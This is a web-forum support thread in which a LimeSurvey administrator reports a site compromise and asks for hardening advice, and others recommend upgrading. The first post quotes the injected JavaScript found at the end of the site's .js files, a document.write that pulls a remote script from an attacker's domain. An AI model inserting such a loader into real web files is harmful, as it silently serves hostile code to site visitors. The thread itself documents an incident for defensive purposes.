Welcome, Guest
Username: Password: Remember me

TOPIC: Hack report

Hack report 7 months 2 weeks ago #105887

  • Andrea
  • Andrea's Avatar
  • OFFLINE
  • Gold Donor
  • Posts: 33
  • Karma: 0
Our limesurvey site was hacked last Friday by www.21cgreen.co.kr.

What I believe is that they got access to our ftp Server, but I am not sure.

Anyway, almost all .js files in "script Directory" and all template.js files in "template Directory" got infected.

They hacked the .js files by adding following code at the end:

/*1ebf93*/

/*ww0939426w09*/

document.write("<script type='text/javascript' src='www.21cgreen.co.kr/yzQBfqrC.php?id=8928221'></"+ "script>");


/*/1ebf93*/

We discovered the hack because the site was very slow yesterday.

In the meantime we have cleaned all files, changed our ftp Password and changed permission of files in These directories to 444.

Is there anything else we can do to make our site more secure?

Best regards
Andrea
The administrator has disabled public write access.

Hack report 7 months 2 weeks ago #105896

  • lowprofile
  • lowprofile's Avatar
  • OFFLINE
  • Junior Lime
  • Posts: 22
  • Thank you received: 1
  • Karma: 0
which version of limesurvey are you using?
The administrator has disabled public write access.

Hack report 7 months 2 weeks ago #105914

  • Andrea
  • Andrea's Avatar
  • OFFLINE
  • Gold Donor
  • Posts: 33
  • Karma: 0
Version 2.00+ Build 131206

Thank you
The administrator has disabled public write access.

Hack report 7 months 2 weeks ago #105916

  • c_schmitz
  • c_schmitz's Avatar
  • OFFLINE
  • LimeSurvey Team
  • Posts: 807
  • Thank you received: 115
  • Karma: 93
You should always update to the latest version (2.05) as there were many security issues resolved since 2.0.
Support us, too. Donate to the LimeSurvey project and help keep us going!
The administrator has disabled public write access.

Hack report 7 months 2 weeks ago #105918

  • Andrea
  • Andrea's Avatar
  • OFFLINE
  • Gold Donor
  • Posts: 33
  • Karma: 0
I already did, but I have this one Survey running on 2.o Version.

Thank you

Andrea
The administrator has disabled public write access.
Moderators: ITEd
Time to create page: 0.102 seconds
Donation Image